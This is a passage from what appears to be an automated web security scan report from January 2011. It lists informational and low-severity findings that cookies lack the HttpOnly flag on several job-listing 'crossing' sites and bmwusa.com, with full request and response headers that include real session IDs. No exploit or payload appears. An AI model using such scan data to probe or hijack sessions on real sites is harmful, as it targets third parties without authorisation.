Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96324

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.147. http://www.volunteercrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109074

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.148. http://www.workathomecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117680

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.149. http://www.writingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:54 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113096

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.150. http://www.bmwusa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error_Cookieless.aspx?DesiredUrl=/&Scheme=http
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: CHECK=XP9y6GTRm#@U; expires=Fri, 21-Jan-2011 19:22:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError_Cookieless.aspx%3fDesiredUrl%3d%2f%26Scheme%3dhttp">here</a>.</h2>
</body></html>

10.151. http://www.bmwusa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; path=/; HttpOnly
Set-Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; expires=Mon, 21-Jan-3011 19:21:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/
Content-Length: 206230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.152. http://www.bmwusa.com/Error_Cookieless.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /Error_Cookieless.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Error_Cookieless.aspx?enc=1PNYPTw66BKqkJk7zHuE3g3WVo1ROm+FL0P1g3W9VCY= HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.bmwusa.com/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 139
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; path=/
Set-Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; expires=Wed, 21-Jan-2015 19:21:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bmwusa.com/">here</a>.</h2>
</body></html>

10.153. http://www.bmwusa.com/ScriptResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=2F-AOzd2Y0PGRp8jK9vbRsOl6-Ldm8Szp0KyHdAli9fpF06wWJJGdEV7HBvTksG9wVa5qC80I78oFjPKinNA8BW4fXH-1aOwrNo8JOflEl09yMuo9lbK70TdKC4GQZKbSB2OU7nNOFZbHv1Q4QaUsmJhLqUOs3OFV_6JRC3kRT7JFwM30&t=218408d1 HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:52 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:52 GMT;path=/
Content-Length: 32229

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...

10.154. http://www.bmwusa.com/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=ZCit8Gm9Dm66VElz-Dlx7uNapXPkA4epDI8AMwu3sVIkDC0fSDwQQvsa6O8fmHTyDoiwD63Zl_78HL2Qp1KFWorQ7nM1&t=634222732007903694 HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 20794
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 21 Jan 2011 19:21:52 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:52 GMT;path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

10.155. http://www.bmwusa.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:18 GMT;path=/
Content-Length: 205829


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.156. http://www.bmwusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; ddretarg=1

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/favicon.ico
Content-Type: image/x-icon
ETag: "e42496de70abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:05:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:22:05 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:42:05 GMT;path=/
Content-Length: 894

...[SNIP]...

10.157. http://www.bmwusa.com/jsenvconst.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:51 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:51 GMT;path=/
Content-Length: 636

var WEBSITE_URL = "www.bmwusa.com";
var WEB_SERVICES_URL = "ws.bmwusa.com";
var WCF_SERVICES_URL = "ws.bmwusa.com";
var RESOURCE_SERVER_URL = "cache.bmwusa.com";
var MOBILE_URL = "m.bmwusa.com";

...[SNIP]...

10.158. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:03:52 GMT;path=/
Content-Length: 202165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.159. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:52 GMT;path=/
Content-Length: 213572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.160. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:44:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:04:20 GMT;path=/
Content-Length: 225243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.161. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

